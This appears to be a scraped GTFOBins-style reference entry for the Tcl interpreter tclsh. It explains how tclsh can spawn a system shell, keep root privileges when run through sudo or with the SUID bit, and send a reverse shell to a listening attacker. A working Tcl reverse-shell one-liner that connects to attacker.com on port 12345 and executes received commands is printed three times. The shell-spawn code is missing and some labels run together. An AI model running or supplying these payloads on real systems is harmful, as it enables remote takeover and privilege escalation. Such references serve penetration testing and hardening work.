This executable can spawn an interactive system shell.
This function can be performed by any unprivileged user.
tclshThis function is performed by the privileged user if executed via sudo because the acquired privileges are not dropped.
tclshThis function is performed by the privileged user if the executable has the SUID bit set and the right ownership because the effective privileges are not dropped.
tclshThis executable can send back a reverse system shell to a listening attacker.
This function can be performed by any unprivileged user.
tclsh
set s [socket attacker.com 12345];while 1 { puts -nonewline $s "> ";flush $s;gets $s c;set e "exec $c";if {![catch {set r [eval $e]} err]} { puts $s $r }; flush $s; }; close $s;This function is performed by the privileged user if executed via sudo because the acquired privileges are not dropped.
tclsh
set s [socket attacker.com 12345];while 1 { puts -nonewline $s "> ";flush $s;gets $s c;set e "exec $c";if {![catch {set r [eval $e]} err]} { puts $s $r }; flush $s; }; close $s;This function is performed by the privileged user if the executable has the SUID bit set and the right ownership because the effective privileges are not dropped.
tclsh
set s [socket attacker.com 12345];while 1 { puts -nonewline $s "> ";flush $s;gets $s c;set e "exec $c";if {![catch {set r [eval $e]} err]} { puts $s $r }; flush $s; }; close $s;